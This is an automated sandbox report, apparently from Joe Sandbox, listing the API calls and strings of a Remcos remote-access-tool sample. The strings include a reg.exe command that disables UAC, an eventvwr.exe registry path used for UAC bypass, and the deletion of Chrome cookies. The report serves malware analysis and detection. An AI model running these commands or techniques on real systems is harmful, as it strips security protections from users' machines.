                          • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 004160E6
                            • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                          • String ID: <$@$@%G$@%G$Temp
                          • API String ID: 1704390241-4139030828
                          • Opcode ID: 2c1979de410b9738e481fa727b302a0dd89e2ec540be45fee9571ea6700d777e
                          • Instruction ID: 980de7e6e99344695fa922fac5fad97fc57b46ec9d0f9c422bd6bd0d3fbbc04a
                          • Opcode Fuzzy Hash: 2c1979de410b9738e481fa727b302a0dd89e2ec540be45fee9571ea6700d777e
                          • Instruction Fuzzy Hash: 48419131900209ABDB14FB61DC56AEEB739AF50308F50417EF505760E2EF785E8ACB99
                          APIs
                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041843C,00000000), ref: 00418AD2
                          • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041843C,00000000), ref: 00418AE9
                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418AF6
                          • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041843C,00000000), ref: 00418B05
                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418B16
                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418B19
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: Service$CloseHandle$Open$ControlManager
                          • String ID:
                          • API String ID: 221034970-0
                          • Opcode ID: c0ea185af2b6cb95e5d246b028910c14a7565b46c2d114a674b25013468a4f31
                          • Instruction ID: 27c4ffebcf7932a5624e60d5a3802e7503a1161fac6a42b5cc64803f4be6ae02
                          • Opcode Fuzzy Hash: c0ea185af2b6cb95e5d246b028910c14a7565b46c2d114a674b25013468a4f31
                          • Instruction Fuzzy Hash: A211E9715002186FD610EF64DC89CFF3B6CDF41B96741012AFA0593192DF789D469AF5
                          APIs
                          • _free.LIBCMT ref: 00445645
                            • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                            • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                          • _free.LIBCMT ref: 00445651
                          • _free.LIBCMT ref: 0044565C
                          • _free.LIBCMT ref: 00445667
                          • _free.LIBCMT ref: 00445672
                          • _free.LIBCMT ref: 0044567D
                          • _free.LIBCMT ref: 00445688
                          • _free.LIBCMT ref: 00445693
                          • _free.LIBCMT ref: 0044569E
                          • _free.LIBCMT ref: 004456AC
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: 93d31162751b94c5375648fc1d7c6d5428524314512021667e8ac2086323d142
                          • Instruction ID: 08dc7793ba969bb8ae61e50cce6790fa76a3b05f45cdd3d63b195ce4761959f1
                          • Opcode Fuzzy Hash: 93d31162751b94c5375648fc1d7c6d5428524314512021667e8ac2086323d142
                          • Instruction Fuzzy Hash: A511CB7610010CBFDB01EF55C986CDD3B65FF04759B4284AAFA885F222EA35DF509B88
                          APIs
                          • Sleep.KERNEL32(00001388), ref: 00409738
                            • Part of subcall function 0040966D: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409745), ref: 004096A3
                            • Part of subcall function 0040966D: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409745), ref: 004096B2
                            • Part of subcall function 0040966D: Sleep.KERNEL32(00002710,?,?,?,00409745), ref: 004096DF
                            • Part of subcall function 0040966D: CloseHandle.KERNEL32(00000000,?,?,?,00409745), ref: 004096E6
                          • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409774
                          • GetFileAttributesW.KERNEL32(00000000), ref: 00409785
                          • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040979C
                          • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409816
                            • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                          • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00469654,00000000,00000000,00000000), ref: 0040991F
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                          • String ID: H"G$H"G
                          • API String ID: 3795512280-1424798214
                          • Opcode ID: 13e2dbf3d5e885c0786faa6bc9ba80587d0ab8a2a4bc2c59858fca73f58dbc4d
                          • Instruction ID: 85d6828eff9e87111454ffe40de9a07a949f8ec8799fb43d86416e8e02d17308
                          • Opcode Fuzzy Hash: 13e2dbf3d5e885c0786faa6bc9ba80587d0ab8a2a4bc2c59858fca73f58dbc4d
                          • Instruction Fuzzy Hash: 9D513D712043015BCB14BB72C9A6ABF76999F90308F00453FB946B72E3DF7D9D09869A
                          APIs
                          • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,004541DF), ref: 00453107
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: DecodePointer
                          • String ID: acos$asin$exp$log$log10$pow$sqrt
                          • API String ID: 3527080286-3064271455
                          • Opcode ID: f53d904abd5658a060f413a89978d0306c3294a3021a30185663c10ae64f840c
                          • Instruction ID: 9333e61b372fbf41addd7e909d3efe481a8fa84217f9852f3907f1ba123c2b47
                          • Opcode Fuzzy Hash: f53d904abd5658a060f413a89978d0306c3294a3021a30185663c10ae64f840c
                          • Instruction Fuzzy Hash: CC518F30900909DBCF10DFA8E9480ADBBB0FF0A347F644196EC81A7216CB799A1DDB1D
                          APIs
                          • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00415A1A
                            • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                          • Sleep.KERNEL32(00000064), ref: 00415A46
                          • DeleteFileW.KERNEL32(00000000), ref: 00415A7A
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CreateDeleteExecuteShellSleep
                          • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                          • API String ID: 1462127192-2001430897
                          • Opcode ID: c216d361bb9ef99ebd7f865ddf1f7fdade912dea526e25dca7a569b2ba1e0d71
                          • Instruction ID: 7fbd65b43d39327dc9f625a99f058064c4c6325298edc9245ab65683dcac2845
                          • Opcode Fuzzy Hash: c216d361bb9ef99ebd7f865ddf1f7fdade912dea526e25dca7a569b2ba1e0d71
                          • Instruction Fuzzy Hash: FA315E719402199ACB04FBA1DC96DEE7768EF50308F40017FF506731E2EE785E8ACA99
                          APIs
                          • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 00406775
                          • ExitProcess.KERNEL32 ref: 00406782
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExecuteExitProcessShell
                          • String ID: H"G$Software\Classes\mscfile\shell\open\command$eventvwr.exe$mscfile\shell\open\command$open$origmsc
                          • API String ID: 1124553745-1488154373
                          • Opcode ID: 8e5fad59d86c60b71b0e885ed10285bbf14514be7c7ad01d69b843f0820051ef
                          • Instruction ID: 062031feec86e4e4641db6525c6f69cb17b792298443eef288e26788f9a4eac4
                          • Opcode Fuzzy Hash: 8e5fad59d86c60b71b0e885ed10285bbf14514be7c7ad01d69b843f0820051ef
                          • Instruction Fuzzy Hash: 36110571A4420166D704B7A2DC57FEF32689B10B09F50003FF906B61D2EEBC5A4982DE
                          APIs
                          • AllocConsole.KERNEL32(00000001), ref: 0041AA5D
                          • ShowWindow.USER32(00000000,00000000), ref: 0041AA76
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocConsoleShowWindow
                          • String ID: * BreakingSecurity.net$ * Remcos v$--------------------------$--------------------------$3.8.0 Pro$CONOUT$
                          • API String ID: 4118500197-4025029772
                          • Opcode ID: 613498324cd6a8c522b436d369b4391aab2e08fe6d6e431343eccbd2d6afca2c
                          • Instruction ID: 07661f9972e693547954b0fc743ee20e91627884e026026f5b86345d1a8b50cd
                          • Opcode Fuzzy Hash: 613498324cd6a8c522b436d369b4391aab2e08fe6d6e431343eccbd2d6afca2c
                          • Instruction Fuzzy Hash: CE015271D803586ADB10EBF59C06FDF77AC6B18708F54142BB100A7095E7FC950C4A2D
                          APIs
                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041B22B
                            • Part of subcall function 0041B2C4: RegisterClassExA.USER32(00000030), ref: 0041B310
                            • Part of subcall function 0041B2C4: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041B32B
                            • Part of subcall function 0041B2C4: GetLastError.KERNEL32 ref: 0041B335
                          • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041B262
                          • lstrcpynA.KERNEL32(00471AF8,Remcos,00000080), ref: 0041B27C
                          • Shell_NotifyIconA.SHELL32(00000000,00471AE0), ref: 0041B292
                          • TranslateMessage.USER32(?), ref: 0041B29E
                          • DispatchMessageA.USER32(?), ref: 0041B2A8
                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041B2B5
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                          • String ID: Remcos
                          • API String ID: 1970332568-165870891
                          • Opcode ID: 6a629144b245819b38f2933f29616ef2380529a0a937335efbac9e54df28edc4
                          • Instruction ID: 392c2ce23d615fe7cfca65c1bdf78dc563e79c4ff08160ae13be93183ad442b8
                          • Opcode Fuzzy Hash: 6a629144b245819b38f2933f29616ef2380529a0a937335efbac9e54df28edc4
                          • Instruction Fuzzy Hash: CD013971901308ABCB10DBB9ED4EEDB7BBCFB85B05F40417AF51992061D7B89489CB68
                          APIs
                            • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                            • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                            • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                            • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                          • _memcmp.LIBVCRUNTIME ref: 00442935
                          • _free.LIBCMT ref: 004429A6
                          • _free.LIBCMT ref: 004429BF
                          • _free.LIBCMT ref: 004429F1
                          • _free.LIBCMT ref: 004429FA
                          • _free.LIBCMT ref: 00442A06
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$ErrorLast$_abort_memcmp
                          • String ID: C
                          • API String ID: 1679612858-1037565863
                          • Opcode ID: 432fc3ea507ab00d5c61cbebfc7d6860faf6a87f9b6526557229100be8563697
                          • Instruction ID: aeaf983377083d43a1268bd0837f448671c9c2270315b144058cc99b7af0bbb4
                          • Opcode Fuzzy Hash: 432fc3ea507ab00d5c61cbebfc7d6860faf6a87f9b6526557229100be8563697
                          • Instruction Fuzzy Hash: C6B14B75A01219DFEB24DF19C984AAEB7B4FF08314F5045AEE849A7350E774AE90CF44
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: tcp$udp
                          • API String ID: 0-3725065008
                          • Opcode ID: 688bcc682103751b5d6e0fc50f4ff73081394bc5db4df513150874dffde81862
                          • Instruction ID: 0146648cb9627796ba72a5075a1bb19f593c332394d5faf8ede73001e6eead87
                          • Opcode Fuzzy Hash: 688bcc682103751b5d6e0fc50f4ff73081394bc5db4df513150874dffde81862
                          • Instruction Fuzzy Hash: 0271AB306083029FDB24CF55C4456ABBBE5AB88B06F14483FF88587351DB78CE85CB8A
                          APIs
                          • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00471E78,00462F54,?,00000000,0040708D,00000000), ref: 00406A56
                          • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,0040708D,00000000,?,?,0000000A,00000000), ref: 00406A9E
                            • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                          • CloseHandle.KERNEL32(00000000,?,00000000,0040708D,00000000,?,?,0000000A,00000000), ref: 00406ADE
                          • MoveFileW.KERNEL32(00000000,00000000), ref: 00406AFB
                          • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00406B26
                          • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00406B36
                            • Part of subcall function 00404B76: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00471E90,00404C29,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404B85
                            • Part of subcall function 00404B76: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040546B), ref: 00404BA3
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                          • String ID: .part
                          • API String ID: 1303771098-3499674018
                          • Opcode ID: b311657231bfd1ddbcc4a820267832357b1505ed209a9d42b0dbde4102a0be9c
                          • Instruction ID: 678cfffe15af58d7f0b712f13b91f409224560124cae5e22a1f642ab954cf825
                          • Opcode Fuzzy Hash: b311657231bfd1ddbcc4a820267832357b1505ed209a9d42b0dbde4102a0be9c
                          • Instruction Fuzzy Hash: 183195715043519FC210FF61D8859AFB7E8EF84305F40493FB946A21E1DB78DE488B9A
                          APIs
                          • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417982
                          • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179A3
                          • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179C3
                          • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179D7
                          • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179ED
                          • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417A0A
                          • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417A25
                          • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00417A41
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: InputSend
                          • String ID:
                          • API String ID: 3431551938-0
                          • Opcode ID: 6aaf5890e5c1829a4f0a9f9de961f2057ca44ae286fc2f2a8f4f79c9cdb01491
                          • Instruction ID: 18205c9a4f61e0979ba7f31da2e0396e133b47f61cec1eebe1044e0c870e5742
                          • Opcode Fuzzy Hash: 6aaf5890e5c1829a4f0a9f9de961f2057ca44ae286fc2f2a8f4f79c9cdb01491
                          • Instruction Fuzzy Hash: BF3180715583086EE311CF51D941BEBBFECEF99B54F00080FF6809A191D2A696C98BA7
                          APIs
                          • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00447ECC,00453EB5,00000000,00000000,00000000,00000000,00000000), ref: 00447799
                          • __fassign.LIBCMT ref: 00447814
                          • __fassign.LIBCMT ref: 0044782F
                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00447855
                          • WriteFile.KERNEL32(?,00000000,00000000,00447ECC,00000000,?,?,?,?,?,?,?,?,?,00447ECC,00453EB5), ref: 00447874
                          • WriteFile.KERNEL32(?,00453EB5,00000001,00447ECC,00000000,?,?,?,?,?,?,?,?,?,00447ECC,00453EB5), ref: 004478AD
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                          • String ID:
                          • API String ID: 1324828854-0
                          • Opcode ID: a748b16374f527b7a80cf69ed727348adf3f69da4df0249be72511d103bd3332
                          • Instruction ID: 74b5e8c6f427b63fe2026e60454d3d85c0c1d9029b0a2cc1a9ecb7a500eaa1fe
                          • Opcode Fuzzy Hash: a748b16374f527b7a80cf69ed727348adf3f69da4df0249be72511d103bd3332
                          • Instruction Fuzzy Hash: 32510870E042499FEB10DFA8DC85AEEBBF8EF09300F14416BE951E7291E7749941CB69
                          APIs
                            • Part of subcall function 0044DE21: _free.LIBCMT ref: 0044DE4A
                          • _free.LIBCMT ref: 0044E128
                            • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                            • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                          • _free.LIBCMT ref: 0044E133
                          • _free.LIBCMT ref: 0044E13E
                          • _free.LIBCMT ref: 0044E192
                          • _free.LIBCMT ref: 0044E19D
                          • _free.LIBCMT ref: 0044E1A8
                          • _free.LIBCMT ref: 0044E1B3
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
                          • Instruction ID: b65b67035ea7ffc6fe2c1778d32cb4f6cbb79ca162155871331ff7aa41bb66fd
                          • Opcode Fuzzy Hash: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
                          • Instruction Fuzzy Hash: 64111571940B08AAE520BFF2CC47FCBB7DC9F14708F50882EB29D6A552DA7DB6044654
                          APIs
                            • Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34
                            • Part of subcall function 00411F91: RegOpenKeyExA.ADVAPI32(80000002,00000400,00000000,00020019,?), ref: 00411FB5
                            • Part of subcall function 00411F91: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00411FD2
                            • Part of subcall function 00411F91: RegCloseKey.ADVAPI32(?), ref: 00411FDD
                          • StrToIntA.SHLWAPI(00000000,00469710,00000000,00000000,00000000,00471FFC,00000001,?,?,?,?,?,?,0040D6A0), ref: 00419327
                          • API ID: CloseCurrentOpenProcessQueryValue
                          • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                          APIs
                          • GetLastError.KERNEL32(?,?,004380F1,0043705E), ref: 00438108
                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00438116
                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043812F
                          • SetLastError.KERNEL32(00000000,?,004380F1,0043705E), ref: 00438181
                          • API ID: ErrorLastValue___vcrt_
                          • String ID:
                          APIs
                          • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040AA1E
                          • GetLastError.KERNEL32 ref: 0040AA28
                          Strings
                          • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040A9E9
                          • UserProfile, xrefs: 0040A9EE
                          • [Chrome Cookies not found], xrefs: 0040AA42
                          • [Chrome Cookies found, cleared!], xrefs: 0040AA4E
                          • API ID: DeleteErrorFileLast
                          • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                          APIs
                          • __allrem.LIBCMT ref: 00438A09
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A25
                          • __allrem.LIBCMT ref: 00438A3C
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A5A
                          • __allrem.LIBCMT ref: 00438A71
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A8F
                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                          • String ID:
                          • API ID: __freea$__alloca_probe_16_free
                          • String ID: a/p$am/pm
                          APIs
                          • std::_Lockit::_Lockit.LIBCPMT ref: 0040F8C4
                          • int.LIBCPMT ref: 0040F8D7
                            • Part of subcall function 0040CAE9: std::_Lockit::_Lockit.LIBCPMT ref: 0040CAFA
                            • Part of subcall function 0040CAE9: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CB14
                          • std::_Facet_Register.LIBCPMT ref: 0040F917
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 0040F920
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040F93E
                          • __Init_thread_footer.LIBCMT ref: 0040F97F
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                          • String ID:
                          APIs
                          • GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                          • _free.LIBCMT ref: 0044575C
                          • _free.LIBCMT ref: 00445784
                          • SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791
                          • SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                          • _abort.LIBCMT ref: 004457A3
                          • API ID: ErrorLast$_free$_abort
                          • String ID:
                          APIs
                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,004185D9,00000000), ref: 00418A6B
                          • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,004185D9,00000000), ref: 00418A7F
                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418A8C
                          • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004185D9,00000000), ref: 00418A9B
                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418AAD
                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418AB0
                          • API ID: Service$CloseHandle$Open$ControlManager
                          • String ID:
                          APIs
                          • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409745), ref: 004096A3
                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409745), ref: 004096B2
                          • Sleep.KERNEL32(00002710,?,?,?,00409745), ref: 004096DF
                          • CloseHandle.KERNEL32(00000000,?,?,?,00409745), ref: 004096E6
                          • API ID: File$CloseCreateHandleSizeSleep
                          • String ID: h G
                          APIs
                          • RegisterClassExA.USER32(00000030), ref: 0041B310
                          • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041B32B
                          • GetLastError.KERNEL32 ref: 0041B335
                          • API ID: ClassCreateErrorLastRegisterWindow
                          • String ID: 0$MsgWindowClass
                          APIs
                          • ___BuildCatchObject.LIBVCRUNTIME ref: 0043761A
                            • Part of subcall function 00437C52: ___AdjustPointer.LIBCMT ref: 00437C9C
                          • _UnwindNestedFrames.LIBCMT ref: 00437631
                          • ___FrameUnwindToState.LIBVCRUNTIME ref: 00437643
                          • CallCatchBlock.LIBVCRUNTIME ref: 00437667
                          • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                          • String ID: /zC
                          APIs
                          • GetSystemMetrics.USER32(0000004C), ref: 004173AA
                          • GetSystemMetrics.USER32(0000004D), ref: 004173B0
                          • GetSystemMetrics.USER32(0000004E), ref: 004173B6
                          • GetSystemMetrics.USER32(0000004F), ref: 004173BC
                          • API ID: MetricsSystem
                          • String ID: ]tA
                          APIs
                          • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?,00000000,00471FFC), ref: 0040E547
                          • CloseHandle.KERNEL32(?,?,?,?,?,00000000,00471FFC), ref: 0040E556
                          • CloseHandle.KERNEL32(?,?,?,?,?,00000000,00471FFC), ref: 0040E55B
                          Strings
                          • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0040E53D
                          • C:\Windows\System32\cmd.exe, xrefs: 0040E542
                          • API ID: CloseHandle$CreateProcess
                          • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                          APIs
                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004407EB,00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002), ref: 0044085A
                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044086D
                          • FreeLibrary.KERNEL32(00000000,?,?,?,004407EB,00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002), ref: 00440890
                          • API ID: AddressFreeHandleLibraryModuleProc
                          • String ID: CorExitProcess$mscoree.dll
                          APIs
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00471E90,00404E5A,00000001,?,00000000,00471E90,00404C88,00000000,?,?,00000000), ref: 00405100
                          • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000), ref: 0040510C
                          • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00471E90,00404C88,00000000,?,?,00000000), ref: 00405117
